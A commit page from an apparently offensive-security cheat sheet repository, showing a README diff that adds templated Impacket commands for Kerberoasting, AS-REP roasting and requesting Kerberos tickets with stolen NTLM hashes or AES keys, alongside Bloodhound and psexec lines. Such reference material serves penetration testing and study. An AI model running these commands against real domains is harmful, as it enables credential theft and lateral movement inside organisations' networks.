kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-09-06 10:54:11 -04:00
committed by GitHub
parent ade7907a34
commit 2f8536fc88
1 changed files with 11 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
README.md
View File

@@ -669,9 +669,18 @@ python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all {DOMAIN}/{US
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request {DOMAIN}/{USERNAME}:{PASSWORD} -dc-ip {IP ADDRESS}
# ASREP ROAST
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -format john
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN}/ -dc-ip {IP ADDRESS} -format john
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
# Request the TGT with hash
python3 /usr/share/doc/python3-impacket/examples/getTGT.py {DOMAIN}/{USERNAME} -hashes {LM HASH}:{NTLM HASH}
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py {DOMAIN}/{USERNAME} -aesKey {AES KEY}
# Request the TGT with password
python getTGT.py {DOMAIN}/{USERNAME}:{PASSWORD}
# Bloodhound
sudo neo4j console # LHOST
@@ -698,9 +707,6 @@ sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes {HASH1:H
```
<br />
# Buffer Overflow